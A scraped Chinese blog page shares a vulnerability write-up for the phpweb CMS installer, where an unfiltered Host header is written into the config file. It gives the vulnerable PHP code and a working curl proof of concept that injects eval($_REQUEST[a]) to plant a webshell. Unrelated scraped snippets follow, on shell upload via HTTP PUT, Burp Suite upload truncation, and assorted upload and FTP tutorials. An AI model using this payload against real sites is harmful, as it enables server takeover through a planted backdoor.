phpweb成品网站最新版(注入、上传、写shell)

注入:
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1: 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2: 有一定安全常识的站长都会删掉 install 目录

虽然鸡肋 但也有优点 : 不受 magic_quotes_gpc 、 webserver 影响

分析:


$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; //未过滤


$filestr = fread(fopen($SysConfigFile, ‘r‘),30000);

$filestr=str_replace(" ","",$filestr);

$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);

$filestr=str_replace("DefaultDbName",$dbname,$filestr);

$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);

$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);

$filestr=str_replace("DefaultsLan","zh_cn",$filestr);

$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);

$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);


fwrite(fopen($ConFile,"w"),$filestr,30000);

$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc
影响 ^ _ ^

poc

curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

phpweb成品网站最新版(注入、上传、写shell),布布扣,bubuko.com

时间: 2024-10-28 11:29:38

phpweb成品网站最新版(注入、上传、写shell)的相关文章

HTTP - PUT 上传文件/Shell (二)

上一篇文章 HTTP - PUT 上传文件/Shell 讲到自己搭了一个环境,去测试HTTP - PUT上传Shell.最近又遇到几个PUT上传的例子,也成功上传了几次,来分享一下思密达. 0x00 判断是否允许HTTP PUT 发送这样的一份报文到服务器,查看服务器返回: OPTIONS / HTTP/1.1 Host: 192.168.9.151:8086 Connection: Keep-alive Accept: text/plain User-Agent: Mozilla/5.0 (W

(转载)利用burp suite截断上传拿shell

burpsuite上传必须要有filepath这个参数 第一步:选择一个jpg后缀的马. 第二步:设置本地代理,burp的本地端口是8080 第三步:打开burp suite 按图操作就ok了. 第四步:点击上传,同时上传的表单就会发送到burp上.点击action 选择send to repeater,之后repeater就会变红. 第五步:修改表单,注意图片中yueyan.asa 后面是有空格的. 第六步悬着hex.hex记录差不多是以十六进制编码数字组成. 第七步:将空格的十六进制20改为

网站用户头像剪裁上传完整案例

做为网站前段开发人员来说,用户头像剪裁和上传是一个很常用的功能,一般这个功能涉及到图片的放大,缩小,移动,旋转,和剪裁.下面我们来做一个完整的demo,剪裁后的图片以base64的形式返回,base64怎么上传到后台服务器,很简单,这里不做介绍. 图片的操作:手机端操作和其他手机图片应用操作没有任何区别. PC端:通过鼠标的滚轮是实现图片的放大缩小,长按左键移动鼠标实现图片的移动,双击图片现实图片的旋转. demo下载地址:下载1 下载2 在这个demo中,我们使用Jquery的插件(jquer

一步一步教你用PHP+MySql搭建网站 No.5 图片上传、故事删除

上篇文章中讲到,story.php中的表单提交之后的页面是story_submit.php,我们就看一下story_submit.php是如何完成文章的发表的 老样子,先上代码: <?php # add / modify story record include_once('include_fns.php'); $handle = db_connect(); $headline = $_REQUEST['headline']; $page = $_REQUEST['page']; $time =

如何使用FlashFXP上传网站程序?

查看ftp信息 [登陆,www.jinlida.cn ,单击主机管理,即可看到ftp主机地址,ftp账号和密码,注意ftp端口号] 1.请先下载并安装FlashFXP_4.1.8.1700-Special, 点击下载:[FlashFXP_4.1.8.1700-Special破解最终版] 2.运行FlashFXP,会弹出注册软件.请选择“输入代码”,即可破解该软件: 3.破解后,FlashFXP会再次自动启动,点击(站点->站点管理器),弹出“站点管理器”窗口: 4.然后在点击“新建站点”按钮,在

Windows服务器修改网站上传文件的大小限制

ASP程序 方法一: 修改该网站的的最大上传文件的大小限制 在Windows server上会出现上传大小受限制的问题,这是由于windows server的IIS管理器做了限制所致,IIS默认设置是最大只能上传200K的文件,下面介绍一下如何修改IIS设置,以使上传不受限制. 进入管理工具->Internet 信息服务(IIS)管理器,找到对应网站,打开该网站的功能页面,依次选择选择IIS->ASP->限制属性->最大请求主体实体限制.将其值修改为你需要的value,点击&quo

web、ftp上传区别

文件上传? 上传就是将信息从个人计算机(或者本地计算机)传送至中央计算机(远程的计算机)系统上,让网络上的人都能看到.将制作好的网页.文字.图片.视频等通过Web或者Ftp传送至互联网上的服务器系统,这一过程称为上传. web上传? web上传就是通过网页的方式,点击"浏览".进行"选定"."上传"进行提交等按钮来上传文件,也就是网页的功能上传. web上传的一般应用如下所示. 例如 1.在web登录方式在线撰写E-mail时添加附件 2.在论坛

Uploadify/uploadifive上传(中文文档)

Uploadify是一款基于JQuery的优秀的文件/图片上传的插件,有基于Flash和HTML5两种版本. Uploadify/uploadifive主要特点有: 1. 多文件上传 2. 个性化设置 3. 上传进度条显示 4. 拖拽上传(HTML5版本) 官网:http://www.uploadify.com 部署 在部署一个Uploadify实例前,请确保满足最低要求: 1.jQuery 1.4.x 或更高版本 2.Flash Player 9.0.24 或更高版本 3.支持PHP, ASP

Wordpress上传到阿里云服务器

Wordpress上传到阿里云服务器 登录服务器 https://account.aliyun.com/login/login.htm 绑定域名 获取FTP信息.数据库信息 在本地修改wordpress的配置文件wp-config.php 使用FileZilla上传网站文件到服务器 上传到htdocs目录 修改服务器数据库wp-option文件的网址链接,改成您的域名 注:此处不改的话进不了后台 访问域名 在浏览器中输入域名即可访问. 注:有时需要清除浏览器缓存,多次刷新清除尝试. GoodLu